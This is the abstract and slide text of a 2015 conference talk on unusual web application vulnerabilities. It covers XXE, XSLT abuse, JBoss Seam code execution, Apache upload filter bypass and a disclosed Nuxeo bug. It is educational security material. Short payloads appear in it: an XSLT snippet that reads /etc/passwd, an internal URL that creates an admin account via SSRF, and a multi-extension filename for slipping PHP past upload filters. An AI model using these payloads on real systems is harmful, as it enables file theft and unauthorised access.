Speaker: Michał Sajdak
Language: English
I will show (live demos!) several web vulnerabilities: first public disclosure of critical bugs in Nuxeo platform, RCE in XSLT transformation, non-standard path traversal examples, problems during processing XML files, or unusual problems with file upload.
During the presentation you will have a chance to win a bottle of vine (received as a bug bounty for reporting the issues to Nuxeo team).
CONFidence: http://confidence.org.pl/pl/
CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak
1. Unusual security problems in web
applications.
Michał Sajdak, CISSP, CEH, F2B
securitum.pl
sekurak.pl
rozwal.to
2. About me
Michał Sajdak <at> securitum.pl
Pentester
Instructor (security trainings)
sekurak.pl founder
rozwal.to founder
2
Copyright 2014 Securitum
www.securitum.pl
3. Agenda
Vulnerabilities in Nuxeo
First public disclosure
(Maybe?) not so obvious path traversal(s)
OS code exec
XXE
JBoss Seam nice RCE
RCE through XSLT transformation (if we have time)
PHP shell upload – filter bypassing (if we have time)
Educational use only
3
Copyright 2014 Securitum
www.securitum.pl
5. Nuxeo
The RPM (Release and Preservation Management)
Department at EA uses the Nuxeo Platform to manage video
game builds at all stages of the development lifecycle
Using the Nuxeo Platform as a core server, Jeppesen, a Boeing
company, syncs flight bag information to iPads for pilots
across the world.
5
Copyright 2015 Securitum
www.securitum.pl
6. Nuxeo
The Nuxeo Platform, offering strong support for SSO, along
with a flexible content management platform, is the perfect
addition to the US Navy’s application portfolio.
Orange manages communication with its mobile
telecommunications and broadband internet provider clients
through a secure extranet portal built on the Nuxeo Platform.
6
Copyright 2015 Securitum
www.securitum.pl
7. Nuxeo
History
Bug patched this year (February)
Reported by Michal Bentkowski & Sebastian Gilon from
securitum.pl
https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+
Update+-+2015-02-27+-+Critical
No details disclosed
DEMO
7
Copyright 2015 Securitum
www.securitum.pl
8. Nuxeo – reporting history
Securitum:
Hey, you got some nasty bugs in your platform. Here are the details.
Nuxeo:
Cool, these are definitely nice bugs! We’ll prepare a patch soon!
BTW: do you want something for reporting the bug?
Securitum:
no :-)
Nuxeo:
Do you drink from time to time?
Securitum:
Sometimes :P
Nuxeo:
Cool, we are sending 2 crates of vine to Poland 8
10. XXE (XML eXternal Entities)
XXE has been known for a while
But many many applications are vulnerable by
default
BTW: XXE tests are available only in the latest
versions of burp suite
(very popular web pentesting tool)
10
Copyright 2014 Securitum
www.securitum.pl
11. XXE (XML eXternal Entities)
HTML entiries
< lub <
<
"
'
&
µ
…
Or:
&entity_name;
&#entity_number;
11
Copyright 2014 Securitum
www.securitum.pl
16. XXE (XML eXternal Entities)
We can only read files?
No :p
Making http requests
Transfering files to your server (blind XXE)
Making request to 127.0.0.1
Some of these are unauthenticated ?
Scanning backend infrastruture
Services with no auth check, etc.
http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
16
Copyright 2014 Securitum
www.securitum.pl
17. XXE (XML eXternal Entities)
Actually we can often exploit XXE when no tag is
displayed (!)
ie. only when the XML parser starts.
Parameter Entity
They can be used only in DOCTYPE
<!ENTITY % name "entity_value">
17
Copyright 2014 Securitum
www.securitum.pl
19. XXE (XML eXternal Entities)
Can we only read files?
No :P
Making http requests
Transfering files to your server (blind XXE)
FW must allow outgoing http communication
Making request to 127.0.0.1
Some of there are unauthenticated ?
Scanning backend infrastructore
Services with no auth check, etc.
19
Copyright 2014 Securitum
www.securitum.pl
22. XSLT
Commonly used for custom styling in web
apps
XML (db generated) + XSLT (user provided styles)
= nice HTML
= nice PDF
etc.
22
Copyright 2014 Securitum
www.securitum.pl
24. XSLT
We can have a problem when a user
(ie. attacker) can provide XSL file to be parsed
at server side
Example: custom destkop in web app
Example: print templates
…
24
Copyright 2014 Securitum
www.securitum.pl
26. XSLT
PHP
Doesn’t work by default…
But reading files does:
<xsl:template match="/">
<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
26
Copyright 2014 Securitum
www.securitum.pl
27. OS Command Exec – JBoss Seam
But an example of the following problem
We deploy an app which uses library X
After some time… vulnerabilities in the used lib
Info: Meder Kydyraliev, Seam Vulnerability,
http://blog.o0o.nu/
27
Copyright 2014 Securitum
www.securitum.pl
28. OS Command Exec – JBoss Seam
There is (are) a vulnerability in JBoss Seam
which allows you to exec OS code
No auth needed
No specific condition needed
The only requirement – an app is using the
vulnerable version of the lib
DEMO
28
Copyright 2014 Securitum
www.securitum.pl
29. Upload / Apache – filter bypassing
Commonly used methods:
File extension blacklisting
ie.: no .php / .jsp / etc. can be uploaded
Checking file structure
ie.: if the uploaded file is a real image / pdf / etc
29
Copyright 2014 Securitum
www.securitum.pl
30. Upload / Apache – filter bypassing
Interesting fact
How many of apache servers will interpret the
following file:
test.jpg.php.wnk2j3.tralalala.sekurak
txt ?
php ?
jpg ?
30
Copyright 2014 Securitum
www.securitum.pl
32. What’s next?
dotnetnuke – full unauth admin
TP-link devices
Two new methods for gaining OS root
One sort of universal – works in old/new devices
Disclosure on sekurak.pl ~soon
32
Copyright 2014 Securitum
www.securitum.pl